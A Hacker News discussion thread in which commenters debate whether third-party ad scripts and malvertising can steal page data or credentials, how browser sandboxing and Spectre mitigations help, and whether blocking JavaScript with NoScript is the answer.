This has been demonstrated to be wrong (see: every time there's malware on an ad network).


There has been no instance of malware on an ad network (that I know of).

The malware has been in an ad creative, and those are sandboxed. The malware has usually exploited weaknesses in the browser, but if there weren't browser exploits, it still wouldn't get access to the host page.

Such browser exploits are getting harder to find with things like per-domain processes isolation in Chromium based browsers.


The only thing creative here is the imagination that the ad network is not responsible for the content it serves, though I recognise we may just have fundamentally different outlooks on responsibility. If that is the case, I feel like discussing it further is not going to help either one of us.


How about side channel attack (such as meltdown and spectre) from ads? Is it possible?


Normally yes, but most browsers have mitigations in place that prevent this from happening, for some degree of prevent. But browser mitigations, plus OS updates and Intel/AMD firwmare updates, for machines that stay up to date make the specific Meltdown/Spectre attacks mostly not a thing in JS(in the browser).

That said, Javascript(in browser) and Security are basically 100% opposites. If you can execute JS in a browser, you can do whatever you want to that page in the browser.


There is a problem with mitigations in web browsers, the only practical problem they are targeting is a hypothetical situation of a 3rd party script running in a sandboxed iframe, but almost none of them do! They don't need side channels to steal anything, they are not isolated. And the only acceptable use for a sandboxed 3rd party iframe is to block it by default.


Well, I was going to say more on the subject, but didn't want to get flamed by JS lovers. I did say "If you can execute JS in a browser, you can do whatever you want to that page in the browser."

I don't disagree with your point, but there is another perspective that the mitigations aim to stop, which is cross-tab/window data gathering (and cross process), which is most of the point of Spectre and friends anyways, which is stealing data from some other process, not the process you are running under. Stealing from your own process is easy. Stealing from another process is supposed to be hard, and stealing from the kernel is supposed to be impossible.


Many years ago, I was a software architect at an online travel company. Marketing kept asking me to approve third-party hosted tracking scripts walking the DOM looking for tracking tags at every step on our purchase path. I objected on the billing page, simply because I couldn't guarantee the safety of credit card numbers and customer data, but said it would be okay if we reviewed and hosted their js statically, but the third parties always refused.

Perhaps I overreacted, because at the time, the e-commerce industry didn't seem to care about the risk. Do they now?

I hope OWASP/PCI/GDPR have since developed opinions about third party hosted js on sensitive pages.


So the solution is to disable JS?


Basically, yes. I use NoScript, blocking everything by default. If a page doesn't load, I enable stuff until it does. I've been doing this for years, so I know what's generally needed.

But for Goodreads, I'd be hosed as soon as I allowed the site itself:

> In the case of goodreads, their HTML contains javascript from the ad provider. Specifically, lines 81-145 of the HTML document returned by https://www.goodreads.com/ read:

However, it's more or less readable without allowing any scripts. So hey.

So was that a way to work around ad blockers?


TL;DR: yes.

They suggest mitigating this by putting ads in a sandboxed iframe (unlikely and probably not foolproof) and not having ads on a login page, but ads can probably still steal your credentials.

It should be obvious that loading untrusted third-party content compromises security, but apparently that is unimportant to sites that use third-party advertising services.


Isn't most OS's now blocking read access to text fields labeled as "password"? I'm pretty sure MacOS does this now.


Not in the browser.




Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: